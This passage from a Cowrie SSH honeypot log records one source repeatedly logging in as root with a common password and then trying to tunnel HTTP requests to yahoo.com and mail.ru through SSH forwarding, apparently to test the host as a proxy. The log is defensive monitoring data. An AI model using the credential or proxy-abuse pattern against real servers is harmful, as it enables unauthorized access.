{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:45.993865Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":7546,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7546","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.136167Z","session":"5e5de88a29d7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.186026Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.236738Z","src_ip":"77.83.207.83","session":"5e5de88a29d7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36202,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b6a81c64960","protocol":"ssh","message":"New connection: 77.83.207.83:36202 (1.2.3.4:22) [session: 7b6a81c64960]","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.286501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.287185Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.337709Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.589060Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11892,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11892","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.641287Z","session":"7b6a81c64960"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.691825Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":3558,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:3558","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.832730Z","session":"7b6a81c64960"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:46.883201Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":7497,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7497","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.024790Z","session":"7b6a81c64960"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.075167Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.126295Z","src_ip":"77.83.207.83","session":"7b6a81c64960"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36313,"dst_ip":"1.2.3.4","dst_port":22,"session":"35c1affee187","protocol":"ssh","message":"New connection: 77.83.207.83:36313 (1.2.3.4:22) [session: 35c1affee187]","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.174582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.175582Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.225371Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.473319Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31669,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31669","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.523900Z","session":"35c1affee187"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.573808Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":8559,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8559","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.716042Z","session":"35c1affee187"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.765738Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":19721,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19721","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.907953Z","session":"35c1affee187"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:47.957734Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.008694Z","src_ip":"77.83.207.83","session":"35c1affee187"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36401,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0936f8400f7","protocol":"ssh","message":"New connection: 77.83.207.83:36401 (1.2.3.4:22) [session: a0936f8400f7]","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.057976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.067933Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.108930Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.360535Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30279,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:30279","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.412784Z","session":"a0936f8400f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.463312Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23910,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23910","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.604769Z","session":"a0936f8400f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.655311Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":16769,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:16769","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.796732Z","session":"a0936f8400f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.847201Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.898852Z","src_ip":"77.83.207.83","session":"a0936f8400f7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36510,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1c2c271dc71","protocol":"ssh","message":"New connection: 77.83.207.83:36510 (1.2.3.4:22) [session: f1c2c271dc71]","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.948488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:48.949850Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.000038Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.249679Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57068,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e256c2689be","protocol":"ssh","message":"New connection: 212.227.125.160:57068 (1.2.3.4:22) [session: 6e256c2689be]","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.281764Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24351,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24351","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.300826Z","session":"f1c2c271dc71"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.351164Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8242,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8242","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.492865Z","session":"f1c2c271dc71"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.543196Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":28942,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:28942","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.684584Z","session":"f1c2c271dc71"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.734741Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.785753Z","src_ip":"77.83.207.83","session":"f1c2c271dc71"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":36610,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e6e449483b3","protocol":"ssh","message":"New connection: 77.83.207.83:36610 (1.2.3.4:22) [session: 6e6e449483b3]","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.835264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:49.836169Z","src_ip":"77.83.207.83","session":"6e6e449483b3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 